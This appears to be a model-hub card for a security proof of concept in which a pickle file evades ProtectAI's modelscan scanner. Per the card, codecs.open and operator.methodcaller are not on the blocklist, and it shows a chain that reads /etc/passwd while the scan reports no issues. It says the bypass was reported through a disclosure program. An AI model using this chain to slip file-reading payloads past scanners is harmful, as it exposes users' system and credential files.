Modelscan Bypass PoC: codecs.open + operator.methodcaller
Purpose: Security research demonstrating a scanner bypass in ProtectAI modelscan.
Technique
codecs.openis not in modelscan's unsafe_globals blocklist (onlybuiltins.openis blocked)operator.methodcalleris not blocked (onlyoperator.attrgetteris)- Chain:
methodcaller('read')(codecs.open('/etc/passwd'))→ reads any file
Verification
pip install modelscan
modelscan scan -p model.pkl
# Output: "No issues found!"
python3 -c "import pickle; print(pickle.load(open('model.pkl','rb'))[:100])"
# Output: contents of /etc/passwd
Responsible Disclosure
Submitted to ProtectAI via Huntr MFV program.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support